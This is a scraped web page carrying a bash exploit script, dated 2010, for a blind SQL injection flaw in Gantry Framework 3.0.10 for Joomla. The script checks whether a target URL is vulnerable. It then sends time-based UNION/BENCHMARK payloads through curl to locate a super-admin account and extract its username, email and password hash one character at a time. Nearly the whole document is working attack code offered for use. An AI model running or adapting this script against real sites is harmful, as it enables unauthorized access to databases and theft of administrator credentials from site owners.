扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 |
#!/bin/bash # Exploit Title: Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit # Date: 4 September 2010 # Author: jdc # Software Link: http://www.gantry-framework.org # Version: 3.0.10 # Patched: 3.0.11 if [ "$1" == "" ] then echo "$0 usage: $0 url [debug]" echo "" exit 1 fi clear echo "##############################################################" echo "## Gantry Framework 3.0.10 Blind SQL Injection Exploit##" echo "##############################################################" echo "" echo " Probing target $1 ..." echo "" GANTRY_PATH="$1/index.php" GANTRY_TIMEOUT="5" GANTRY_DELAY="10" GANTRY_AGENT='Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)' GANTRY_DATA="option=com_gantry&tmpl=gantry-ajax&model=module&moduleid=" GANTRY_BENCHMARK="10000000" GANTRY_ADMIN_ID="" GANTRY_OUTPUT="" GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" GANTRY_TEST=<code>curl -s -A "$GANTRY_AGENT" -d "$GANTRY_DATA$GANTRY_EXPLOIT" "$GANTRY_PATH" GANTRY_REQUESTS="1" if [ "Direct access not allowed." != "$GANTRY_TEST" ] then echo $GANTRY_TEST echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Site not vulnerable. Bailing! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo -n " Trying to get a super admin id... " for N in <code>seq 62 9999 do GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$N),BENCHMARK($GANTRY_BENCHMARK,MD5(1)),16)" GANTRY_TIME="<code>curl -s -A "$GANTRY_AGENT" -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d "$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH</code>" GANTRY_REQUESTS=<code>echo "$GANTRY_REQUESTS + 1" | bc if [ "" != "$2" ] then printf "$N" echo "$GANTRY_TIME" fi if [ <code>echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc</code> == 1 ] then GANTRY_ADMIN_ID="$N" break fi sleep $GANTRY_DELAY done if [ "" == $GANTRY_ADMIN_ID ] then echo "FAILED!" echo "" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Injection FAILED! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo $GANTRY_ADMIN_ID echo " Fetching admin info (this WILL take a while)... " echo "" echo -n " > " for I in <code>seq 1 250 do GANTRY_LENGTH=<code>echo "$GANTRY_OUTPUT" | wc -c GANTRY_CONTINUE=0 #a,d,m,i,n,b-c,e-h,j-l,o-z,A-Z,0-9,special chars for J in <code>seq 97 97;seq 100 100;seq 109 109;seq 105 105;seq 110 110;seq 98 99;seq 101 104;seq 106 108;seq 111 122;seq 65 90;seq 48 57;seq 32 47;seq 58 64;seq 91 96;seq 123 126 do if [ 1 == $GANTRY_CONTINUE ] then continue fi sleep $GANTRY_DELAY GANTRY_EXPLOIT="-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,IF((SELECT%20id%20FROM%20%23__users%20WHERE%20gid=25%20AND%20id=$GANTRY_ADMIN_ID%20AND%20ASCII(SUBSTRING(CONCAT(username,0x3a,email,0x3a,password),$I,1))=$J),BENCHMARK(10000000,MD5(1)),16)" GANTRY_TIME="<code>curl -s -A "$GANTRY_AGENT" -o /dev/null -w '%{time_total}' -H 'X-Requested-With: XMLHttpRequest' -d "$GANTRY_DATA$GANTRY_EXPLOIT" $GANTRY_PATH</code>" GANTRY_REQUESTS=<code>echo "$GANTRY_REQUESTS + 1" | bc if [ "" != "$2" ] then printf "\x$(printf %x $J)" echo "$GANTRY_TIME" fi if [ <code>echo "$GANTRY_TIME > $GANTRY_TIMEOUT" | bc</code> == 1 ] then LETTER=<code>printf "\x$(printf %x $J)" GANTRY_OUTPUT="$GANTRY_OUTPUT$LETTER" GANTRY_CONTINUE=1 if [ "" == "$2" ] then echo -n "$LETTER" fi fi done GANTRY_LENGTH2=<code>echo "$GANTRY_OUTPUT" | wc -c if [ "$GANTRY_LENGTH" == "$GANTRY_LENGTH2" ] then break fi done echo "" if [ "$GANTRY_OUTPUT" == "" ] then echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "!! Injection FAILED! !!" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 1 fi echo "" echo "$GANTRY_OUTPUT" echo "" echo "$GANTRY_REQUESTS requests" echo "" exit 0 |
体验盒子
